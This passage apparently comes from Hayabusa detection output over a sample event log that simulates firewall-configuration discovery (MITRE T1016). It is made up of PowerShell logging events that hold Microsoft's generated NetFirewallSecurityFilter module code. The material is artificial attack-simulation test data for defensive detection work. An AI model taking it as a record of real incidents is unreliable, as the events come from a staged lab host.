$true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSecurityFilter' function Set-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUsers'; ParameterTyp",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.879 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"e = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSecurityFilter'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.895 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.895 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.895 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.895 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.895 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallSecurityFilter""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.895 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSecurityFilter""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.895 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.895 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.895 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.895 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.895 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication[]] ${Authentication}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption[]] ${Encryption}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${LocalUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteMachine}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Authentication') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Authentication}) $__cmdletization_queryBuilder.FilterByProperty('Authentication', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Encryption') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Encryption}) $__cmdletization_queryBuilder.FilterByProperty('Encryption', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OverrideBlockRules') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OverrideBlockRules}) $__cmdletization_queryBuilder.FilterByProperty('OverrideBlockRules', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalUser}) $__cmdletization_queryBuilder.FilterByProperty('LocalUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteUser}) $__cmdletization_queryBuilder.FilterByProperty('RemoteUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteMachine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteMachine}) $__cmdletization_queryBuilder.FilterByProperty('RemoteMachines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterBySecurity', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.895 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = 